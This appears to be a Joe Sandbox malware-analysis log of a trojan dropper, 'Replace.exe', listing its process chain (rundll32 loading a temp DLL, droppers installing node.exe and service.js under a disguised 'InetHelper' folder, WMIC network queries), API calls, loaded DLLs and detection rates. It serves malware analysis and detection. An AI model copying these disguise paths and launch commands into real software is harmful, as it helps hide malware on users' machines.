Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E2B1000 OpenSCManagerW,OpenServiceW,ControlService,GetLastError,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,1_2_6E2B1000
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,13_2_004034A5
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpCode function: 20_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,20_2_004034A5
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe 79AC7AE94231A392D27F303418E305A60C4194DBBE143C5DEFFC977C7B2E7A78
Source: C:\Users\user\Desktop\Replace.exeCode function: String function: 00BD9176 appears 66 times
Source: C:\Users\user\Desktop\Replace.exeCode function: String function: 00BCC5F0 appears 39 times
Source: FLEngine_x64.dll.2.drStatic PE information: Number of sections : 14 > 10
Source: Replace.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.evad.winEXE@90/28@11/7
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FB976CC GetLastError,FormatMessageW,2_2_00007FF75FB976CC
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,13_2_00404850
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6E2B10AC CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,GetLastError,FindCloseChangeNotification,1_2_6E2B10AC
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpCode function: 13_2_00402104 CoCreateInstance,13_2_00402104
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeCode function: 2_2_00007FF75FBAE32C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,2_2_00007FF75FBAE32C
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exeFile created: C:\Program Files\Image-LineJump to behavior
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelperJump to behavior
Source: C:\Users\user\Desktop\Replace.exeFile created: C:\Users\user\AppData\Local\Temp\7zS49DD90FAJump to behavior
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: 7-Zip0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: run.exe0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: %%T\0_2_00BCB658
Source: C:\Users\user\Desktop\Replace.exeCommand line argument: %%T0_2_00BCB658
Source: Replace.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Replace.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: Replace.exeReversingLabs: Detection: 28%
Source: Replace.exeVirustotal: Detection: 49%
Source: rundll32.exeString found in binary or memory: /downloads/winapp/latest-installer.exe
Source: C:\Users\user\Desktop\Replace.exeFile read: C:\Users\user\Desktop\Replace.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Replace.exe "C:\Users\user\Desktop\Replace.exe"
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Users\user\Desktop\Replace.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe .\run.exe
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsA071.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmpProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\service.js"
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
Source: C:\Users\user\Desktop\Replace.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Users\user\Desktop\Replace.exe Process created: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe .\run.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Users\user\AppData\Local\Temp\wnsA071.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2500 --field-trial-handle=2272,i,3908760233601738939,4589788007160690134,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Users\user\AppData\Local\Temp\wsc86FC.tmp",Start verpostfix=bt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp wscsu.exe /S /VERPOSTFIX=bt
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Process created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Process created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe" St0P
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Process created: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
Source: C:\Users\user\Desktop\Replace.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Replace.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wnsA071.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsCCC1.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\wnsF0F3.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exeSection loaded: winrnr.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
